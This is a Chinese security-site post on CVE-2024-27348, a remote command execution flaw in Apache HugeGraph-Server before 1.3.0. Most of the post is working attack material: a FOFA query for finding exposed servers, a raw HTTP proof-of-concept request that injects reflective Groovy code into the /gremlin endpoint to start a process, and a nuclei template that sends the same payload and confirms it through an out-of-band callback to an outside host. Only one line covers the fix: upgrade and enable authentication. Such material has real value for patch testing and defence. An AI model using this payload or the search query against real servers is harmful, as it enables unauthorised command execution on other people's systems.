Apache-HugeGraph-Server远程代码执行漏洞(CVE-2024-27348)|博明网络

Apache HugeGraph-Server 中的 RCE-远程命令执行漏洞。此问题影响 Apache HugeGraph-Server：Java8 和 Java11 中 1.3.0 之前的 1.0.0 建议用户升级到 Java11 版本 1.3.0 并启用身份验证系统，这解决了这个问题。

fofa

app="HugeGraph-Studio"

poc

POST /gremlin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}

nuclei

id: CVE-2024-27348

info:
  name: Apache HugeGraph-Server - Remote Command Execution
  author: DhiyaneshDK
  severity: high
  description: |
    Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
  reference:
    - http://www.openwall.com/lists/oss-security/2024/04/22/3
    - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
    - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
    - https://github.com/Zeyad-Azima/CVE-2024-27348
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27348
  classification:
    cve-id: CVE-2024-27348
    cwe-id: CWE-77
    epss-score: 0.00045
    epss-percentile: 0.15047
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"HugeGraph"
    fofa-query: title="HugeGraph"
  tags: cve,cve2024,hugegraph,rce,apache

http:
  - raw:
      - |
        POST /gremlin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(header, "application/json")'
          - 'contains(body, "inputStream\":")'
        condition: and

文章版权声明 1、本网站名称：博明网络
2、本站永久网址：https://www.laoxinsec.com
3、本网站的文章部分内容可能来源于网络，仅供大家学习与参考，如有侵权，请联系站长QQ740701843进行删除处理。
4、本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息，访客发现请向站长举报
6、本站资源大多存储在云盘，如发现链接失效，请联系我们我们会第一时间更新。

THE END

漏洞文库